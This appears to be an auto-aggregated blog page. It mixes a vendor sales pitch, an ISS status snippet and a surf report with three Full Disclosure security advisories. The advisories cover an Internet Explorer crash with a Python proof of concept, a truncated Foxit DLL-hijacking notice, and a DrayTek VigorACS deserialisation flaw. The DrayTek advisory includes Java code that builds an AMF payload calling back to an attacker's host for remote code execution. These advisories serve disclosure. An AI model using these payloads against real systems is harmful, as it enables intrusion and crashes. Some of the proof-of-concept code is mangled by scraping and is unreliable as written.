[FD] wifi and z-wave smart home from zibreo

Hi manager, I’m Chris from Zibreo, a leading producer of home automation based in Shenzhen, China. 1) We have WiFi smart plug,water detector, PIR motion sensor, RGB bulb etc, they can work with Amazon Alexa, Google home, IFTTT. 2) Z-Wave devices are compatible with all of z-wave controllers in the market such as Fibaro, smartthings etc. 3) Battery-operated with 2-year lifetime. Contact me if you need further details. Thanks. Chris

Source: Gmail -> IFTTT-> Blogger

from Blogger http://insidenothing.blogspot.com/2018/04/fd-wifi-and-z-wave-smart-home-from.html


[FD] Microsoft (Win 10) InternetExplorer v11.371.16299.0 – Denial Of Service

[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: https://ift.tt/2HEjHve [+] ISR: ApparitionSec Vendor: =======www.microsoft.com Product: ======== Internet Explorer (Windows 10) v11.371.16299.0 Internet Explorer is a series of graphical web browsers developed by Microsoft and included in the Microsoft Windows line of operating systems, starting in 1995. Vulnerability Type: ================== Denial Of Service CVE Reference: ============== N/A Security Issue: ================ A null pointer de-reference (read) results in an InternetExplorer Denial of Service (crash) when MSIE encounters an specially crafted HTML HREF tag containing an empty reference for certain Windows file types. Upon IE crash it will at times daringly attempt to restart itself, if that occurs and user is prompted by IE to restore their browser session, then selecting this option so far in my tests has shown to repeat the crash all over again. This can be leveraged by visiting a hostile webpage or link to crash an end users MSIE browser. Referencing some of the following extensions .exe:, .com:, .pif:, .bat: and .scr: should produce the same πŸ™‚ Tested Windows 10 Stack Dump: ========== (2e8c.27e4): Access violation – code c0000005 (first/second chance not available) ntdll!NtWaitForMultipleObjects+0x14: 00007ffa`be5f0e14 c3 ret 0:015> r rax=000000000000005b rbx=0000000000000003 rcx=0000000000000003 rdx=000000cca6efd3a8 rsi=0000000000000000 rdi=0000000000000003 rip=00007ffabe5f0e14 rsp=000000cca6efcfa8 rbp=0000000000000000 r8=0000000000000000 r9=0000000000000000 r10=0000000000000000 r11=0000000000000246 r12=0000000000000010 r13=000000cca6efd3a8 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei pl zr na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 ntdll!NtWaitForMultipleObjects+0x14: 00007ffa`be5f0e14 c3 ret CONTEXT: (.ecxr) rax=0000000000000000 rbx=000001fd4a2ec9d8 rcx=0000000000000000 rdx=00007ffabb499398 rsi=000001fd4a5b0ce0 rdi=0000000000000000 rip=00007ffabb7fc646 rsp=000000cca6efe4f8 rbp=000000cca6efe600 r8=0000000000000000 r9=0000000000008000 r10=00007ffabb499398 r11=0000000000000000 r12=0000000000000000 r13=00007ffabb48d060 r14=0000000000000002 r15=0000000000000001 iopl=0 nv up ei pl zr na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 KERNELBASE!StrCmpICW+0x6: 00007ffa`bb7fc646 450fb70b movzx r9d,word ptr [r11] ds:00000000`00000000=???? Resetting default scope FAULTING_IP: KERNELBASE!StrCmpICW+6 00007ffa`bb7fc646 450fb70b movzx r9d,word ptr [r11] EXCEPTION_RECORD: (.exr -1) ExceptionAddress: 00007ffabb7fc646 (KERNELBASE!StrCmpICW+0x0000000000000006) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 0000000000000000 Parameter[1]: 0000000000000000 Attempt to read from address 0000000000000000 DEFAULT_BUCKET_ID: NULL_POINTER_READ PROCESS_NAME: iexplore.exe POC video URL: ==============https://ift.tt/2JeIZx3 Exploit/POC: ============ 1) Run below python script to create “IE-Win10-Crasha.html” 2) Open IE-Win10-Crasha.html in InternetExplorer v11.371.16299 on Windows 10 payload=(‘
\n’+ ‘
MSIE v11.371.16299 Denial Of Service by hyp3rlinx
\n’+ ‘crashy ware shee\n’+ ‘
\n’+ ‘Tested successfully on Windows 10\n’+ ‘

‘) file=open(“IE-Win10-Crasha.html”,”w”) file.write(payload) file.close() print ‘MS InternetExplorer (Win 10) ‘ print ‘Denial Of Service File Created.’ print ‘hyp3rlinx’ Network Access: =============== Remote Severity: ========= Medium Disclosure Timeline: ============================= Vendor Notification: April 18, 2018 vendor closes thread : April 19, 2018 April 20, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied “as-is” with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

Source: Gmail -> IFTTT-> Blogger

from Blogger http://insidenothing.blogspot.com/2018/04/fd-microsoft-win-10-internetexplorer.html

ISS Daily Summary Report – 4/19/2018

Miniature Exercise Device (MED-2):  The crew set up cameras in Node 3 to capture video from multiple views of the Advanced Resistive Exercise Device (ARED) and MED-2 hardware.  They applied body markers, performed dead lifts and rowing exercises and then transferred the video for downlink.  The ISS’s exercise equipment is large and bulky, while the … Continue reading “ISS Daily Summary Report – 4/19/2018”

from ISS On-Orbit Status Report https://ift.tt/2vsqCml

from Blogger http://insidenothing.blogspot.com/2018/04/iss-daily-summary-report-4192018.html

8th St.’s surf is at least 5.36ft high

Maryland-Delaware, April 26, 2018 at 04:00AM

8th St. Summary
At 4:00 AM, surf min of 5.36ft. At 10:00 AM, surf min of 4.46ft. At 4:00 PM, surf min of 3.41ft. At 10:00 PM, surf min of 2.43ft.

Surf maximum: 6.36ft (1.94m)
Surf minimum: 5.36ft (1.63m)
Tide height: 3.22ft (0.98m)
Wind direction: WSW
Wind speed: 11.02 KTS

from Surfline https://ift.tt/1kVmigH

from Blogger http://insidenothing.blogspot.com/2018/04/8th-sts-surf-is-at-least-536ft-high.html

[FD] Foxit Reader ( Unsafe DLL Loading Vulnerability )

Author: Ye Yint Min Thu Htut 1. OVERVIEW The Foxit Reader is vulnerable to Insecure DLL Hijacking Vulnerability. Similar terms that describe this vulnerability have been come up with Remote Binary Planting, and Insecure DLL Loading/Injection/Hijacking/Preloading. 2. PRODUCT DESCRIPTION Foxit Reader is a multilingual freemium PDF tool that can create, view, edit, digitally sign, and print PDF files. Foxit Reader is developed by Fremont, California-based Foxit Software Incorporated. Early versions of Foxit Reader were notable for startup performance and small file size. 3. VULNERABILITY DESCRIPTION The Foxit Reader application passes an insufficiently qualified path in loading an external library when a user launch the application Affected Library List

Source: Gmail -> IFTTT-> Blogger

from Blogger http://insidenothing.blogspot.com/2018/04/fd-foxit-reader-83121155-unsafe-dll.html

[FD] [CVE-2017-5641] – DrayTek Vigor ACS 2 Java Deserialisation RCE

Hi all, tl;dr DrayTek Vigor ACS server, a remote enterprise management system for DrayTek routers, uses a vulnerable version of the Adobe / Apache Flex Java library that has a deserialisation vulnerability. This can be exploited by an unauthenticated attacker to achieve RCE as root / SYSTEM on all versions until 2.2.2. Full advisory is below, and a copy of it plus the exploit code is in my repo https://ift.tt/2F2oVLO. Thanks to Beyond Security SSD programme for helping me disclose this vulnerability to the vendor. You can find details on their blog at https://ift.tt/2qFTjqa ==== >> DrayTek VigorACS 2 Unsafe Flex AMF Java Object Deserialization >> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security ================================================================================= Disclosure: 18/04/2018 / Last updated: 19/04/2018 >> Background and summary From the vendor’s website [1]: “VigorACS 2 is a powerful centralized management software for Vigor Routers and VigorAPs, it is an integrated solution for configuring, monitoring, and maintenance of multiple Vigor devices from a single portal. VigorACS 2 is based on TR-069 standard, which is an application layer protocol that provides the secure communication between the server and CPEs, and allows Network Administrator to manage all the Vigor devices (CPEs) from anywhere on the Internet. VigorACS 2 Central Management is suitable for the enterprise customers with a large scale of DrayTek routers and APs, or the System Integrator who need to provide a real-time service for their customer’s DrayTek devices.” VigorACS is a Java application that runs on both Windows and Linux. It exposes a number of servlets / endpoints under /ACSServer, which are used for various functions of VigorACS, such as the management of routers and firewalls using the TR-069 protocol [2]. One of the endpoints exposed by VigorACS, at /ACSServer/messabroker/amf, is an Adobe/Apache Flex service that is reachable by the managed routers and firewalls. This advisory shows that VigorACS uses a Flex version is vulnerable to CVE-2017-5641 [3], a vulnerability related to unsafe Java deserialization for Flex AMF objects, which can be abused to achieve unauthenticated remote code execution as root under Linux or SYSTEM under Windows. This vulnerability was disclosed under Beyond Security SecuriTeam Secure Disclosure (SSD) programme, which have provided assistance to the vendor throughout the disclosure process [4]. >> Technical details: Vulnerability: Unsafe Flex AMF Java Object Deserialization CVE-2017-5641 Attack Vector: Remote Constraints: None; exploitable by an unauthenticated attacker Affected versions: confirmed on v2.2.1; earlier versions most likely affected By sending an HTTP POST request with random data to /ACSServer/messagebroker/amf, the server will respond with a 200 OK and binary data that includes: …Unsupported AMF version XXXXX… While in the server logs, a stack trace will be produced that includes the following: flex.messaging.io.amf.AmfMessageDeserializer.readMessage … flex.messaging.endpoints.amf.SerializationFilter.invoke … … A quick Internet search revealed CVE-2017-5641 [3], which clearly states in its description: “Previous versions of Apache Flex BlazeDS (4.7.2 and earlier) did not restrict which types were allowed for AMF(X) object deserialization by default. During the deserialization process code is executed that for several known types has undesired side-effects. Other, unknown types may also exhibit such behaviors. One vector in the Java standard library exists that allows an attacker to trigger possibly further exploitable Java deserialization of untrusted data. Other known vectors in third party libraries can be used to trigger remote code execution.” Further reading in [5], [6] and [7] led to proof of concept code (Appendix A) that creates a binary payload that can be exploited to achieve remote code execution through unsafe Java deserialization. A fully working exploit has been released with this advisory that works in the following way: a) sends an AMF binary payload to /ACSServer/messagebroker/amf as described in [6] to trigger a Java Remote Method Protocol (JRMP) call back to the attacker b) receives the JRMP connection with ysoserial’s JRMP listener [8] c) configures ysoserial to respond with a CommonsCollections5 or CommonsCollections6 payload, as a vulnerable version of Apache Commons 3.1 is in the Java classpath of the server d) executes code as root / SYSTEM The exploit has been tested against the Linux and Windows Vigor ACS 2.2.1, although it requires a ysoserial jar patched for multi argument handling (a separate branch in [8], or alternative a ysoserial patched with CommonsCollections5Chained or CommonsCollections6Chained – see [9]). Appendix A contains the Java code used to generate the AMF payload that will be sent in step a). This code is very similar to the one in [6], and it is highly recommended to read that advisory by Markus Wulftange of Code White for a better understanding of this vulnerability. A copy of the Java source code in Appendix A, together with the actual exploit code and the ysoserial patch needed to enable multi argument handling can be fetched from [10]. >> Fix: Upgrade to DrayTek VigorACS version 2.2.2 as per the vendor instructions [11]. >> Appendix A: === import flex.messaging.io.amf.MessageBody; import flex.messaging.io.amf.ActionMessage; import flex.messaging.io.SerializationContext; import flex.messaging.io.amf.AmfMessageSerializer; import java.io.*; public class ACSFlex { public static void main(String[] args) { Object unicastRef = generateUnicastRef(args[0], Integer.parseInt(args[1])); // serialize object to AMF message try { byte[] amf = new byte[0]; amf = serialize((unicastRef)); DataOutputStream os = new DataOutputStream(new FileOutputStream(args[2])); os.write(amf); System.out.println(“Done, payload written to ” + args[2]); } catch (IOException e) { e.printStackTrace(); } } public static Object generateUnicastRef(String host, int port) { java.rmi.server.ObjID objId = new java.rmi.server.ObjID(); sun.rmi.transport.tcp.TCPEndpoint endpoint = new sun.rmi.transport.tcp.TCPEndpoint(host, port); sun.rmi.transport.LiveRef liveRef = new sun.rmi.transport.LiveRef(objId, endpoint, false); return new sun.rmi.server.UnicastRef(liveRef); } public static byte[] serialize(Object data) throws IOException { MessageBody body = new MessageBody(); body.setData(data); ActionMessage message = new ActionMessage(); message.addBody(body); ByteArrayOutputStream out = new ByteArrayOutputStream(); AmfMessageSerializer serializer = new AmfMessageSerializer(); serializer.initialize(SerializationContext.getSerializationContext(), out, null); serializer.writeMessage(message); return out.toByteArray(); } } === >> References: [1] https://ift.tt/2F1qWIl [2] https://ift.tt/2HKSsMZ [3] https://ift.tt/2vwN7q8 [4] https://ift.tt/2qFTjqa [5] https://ift.tt/2nXrCHF [6] https://ift.tt/2vxuPVS [7] https://ift.tt/2q7G18y [8] https://ift.tt/1MlRZLw [9] https://ift.tt/2HPzyVy [10] https://ift.tt/2F2oVLO [11] https://ift.tt/2vwN9OM ================ Agile Information Security Limited https://ift.tt/1JewOIU >> Enabling secure digital business >>

Source: Gmail -> IFTTT-> Blogger

from Blogger http://insidenothing.blogspot.com/2018/04/fd-cve-2017-5641-draytek-vigor-acs-2.html